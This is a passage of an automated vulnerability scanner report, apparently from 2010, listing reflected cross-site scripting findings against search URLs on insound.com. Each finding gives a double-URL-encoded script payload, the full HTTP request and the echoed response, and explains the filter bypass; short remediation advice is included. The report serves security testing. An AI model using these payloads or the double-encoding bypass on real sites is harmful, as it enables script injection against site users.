The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3594%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6465df9e081 was submitted in the REST URL parameter 3. This input was echoed as b3594"><script>alert(1)</script>6465df9e081 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Koen%20Holtkampb3594%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6465df9e081&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=n2j1qmm8pq7hirfpbmomol7ae3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=116924241; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=318663680; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Koen Holtkampb3594"><script>alert(1)</script>6465df9e081" />
...[SNIP]...

1.168. http://www.insound.com/search/query/Koen%20Holtkamp&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Koen%20Holtkamp&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b29c3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee09ffc5f078 was submitted in the REST URL parameter 3. This input was echoed as b29c3</title><script>alert(1)</script>e09ffc5f078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Koen%20Holtkampb29c3%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee09ffc5f078&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=btdd4254ut68bojhoa7685d9m6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=359921856; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=371574253; expires=Sun, 09-Jan-2011 02:40:25 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Koen Holtkampb29c3</title><script>alert(1)</script>e09ffc5f078</title>
...[SNIP]...

1.169. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/LCD%20Soundsystem&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 36a28%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead92594b897 was submitted in the REST URL parameter 3. This input was echoed as 36a28</title><script>alert(1)</script>ad92594b897 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/LCD%20Soundsystem36a28%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ead92594b897&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cma30a42gpg3r47ah7knkfejh5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=227670833; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=182090187; expires=Sun, 09-Jan-2011 02:41:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37537

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>LCD Soundsystem36a28</title><script>alert(1)</script>ad92594b897</title>
...[SNIP]...

1.170. http://www.insound.com/search/query/LCD%20Soundsystem&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/LCD%20Soundsystem&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b248a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fcf689f5c8 was submitted in the REST URL parameter 3. This input was echoed as b248a"><script>alert(1)</script>5fcf689f5c8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/LCD%20Soundsystemb248a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fcf689f5c8&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=ehq45ctu3fb968jlga0jr1s866; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=386945573; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=536046806; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="LCD Soundsystemb248a"><script>alert(1)</script>5fcf689f5c8" />
...[SNIP]...

1.171. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Les%20Sins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8f77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ef034ef7b was submitted in the REST URL parameter 3. This input was echoed as d8f77"><script>alert(1)</script>a1ef034ef7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Les%20Sinsd8f77%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ef034ef7b&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dvfrm6j00ifq5aj87qt091fu37; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=473099195; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=501671464; expires=Sun, 09-Jan-2011 02:40:11 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Les Sinsd8f77"><script>alert(1)</script>a1ef034ef7b" />
...[SNIP]...

1.172. http://www.insound.com/search/query/Les%20Sins&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Les%20Sins&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 6727d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e791b908fde5 was submitted in the REST URL parameter 3. This input was echoed as 6727d</title><script>alert(1)</script>791b908fde5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Les%20Sins6727d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e791b908fde5&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=13i5tclhv7o7l6kdkq2cbq47q7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=360759513; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=467156798; expires=Sun, 09-Jan-2011 02:40:18 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Les Sins6727d</title><script>alert(1)</script>791b908fde5</title>
...[SNIP]...

1.173. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Los%20Campesinos!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 474d6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51236ecae5d was submitted in the REST URL parameter 3. This input was echoed as 474d6</title><script>alert(1)</script>51236ecae5d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Los%20Campesinos!474d6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51236ecae5d&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=qa5jkkp4264vt456nlf4241885; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=155318852; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=244373154; expires=Sun, 09-Jan-2011 02:38:19 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Los Campesinos!474d6</title><script>alert(1)</script>51236ecae5d</title>
...[SNIP]...

1.174. http://www.insound.com/search/query/Los%20Campesinos!&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Los%20Campesinos!&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20920%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec978ed45671 was submitted in the REST URL parameter 3. This input was echoed as 20920"><script>alert(1)</script>c978ed45671 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Los%20Campesinos!20920%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec978ed45671&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:38:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=m74cch2lo1k01vb8ccurg957c5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=28252509; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=527380168; expires=Sun, 09-Jan-2011 02:38:12 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37864

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Los Campesinos!20920"><script>alert(1)</script>c978ed45671" />
...[SNIP]...

1.175. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lower%20Dens&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 35836%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6dde1bc23 was submitted in the REST URL parameter 3. This input was echoed as 35836</title><script>alert(1)</script>bd6dde1bc23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lower%20Dens35836%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebd6dde1bc23&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=mskdrdb1pbgri5g9nldt4h4lj7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=80305440; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=404759631; expires=Sun, 09-Jan-2011 02:37:43 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Lower Dens35836</title><script>alert(1)</script>bd6dde1bc23</title>
...[SNIP]...

1.176. http://www.insound.com/search/query/Lower%20Dens&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lower%20Dens&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b52d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d323a4caa4 was submitted in the REST URL parameter 3. This input was echoed as 3b52d"><script>alert(1)</script>1d323a4caa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lower%20Dens3b52d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1d323a4caa4&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7bp5berl6od3tnleuvcqt7nqi0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=465512889; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=194927980; expires=Sun, 09-Jan-2011 02:37:36 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Lower Dens3b52d"><script>alert(1)</script>1d323a4caa4" />
...[SNIP]...

1.177. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lunice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceb45%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb33609d160 was submitted in the REST URL parameter 3. This input was echoed as ceb45"><script>alert(1)</script>b33609d160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Luniceceb45%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb33609d160&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=eig795d91shfctb04jmid65vb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=98152616; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=369756760; expires=Sun, 09-Jan-2011 02:40:49 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Luniceceb45"><script>alert(1)</script>b33609d160" />
...[SNIP]...

1.178. http://www.insound.com/search/query/Lunice&from=47597/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Lunice&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 39604%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4583cdc3959 was submitted in the REST URL parameter 3. This input was echoed as 39604</title><script>alert(1)</script>4583cdc3959 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Lunice39604%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4583cdc3959&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=o1qgo5iruv8e4uoc3ktha9gt83; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=21806490; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=172781745; expires=Sun, 09-Jan-2011 02:40:55 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
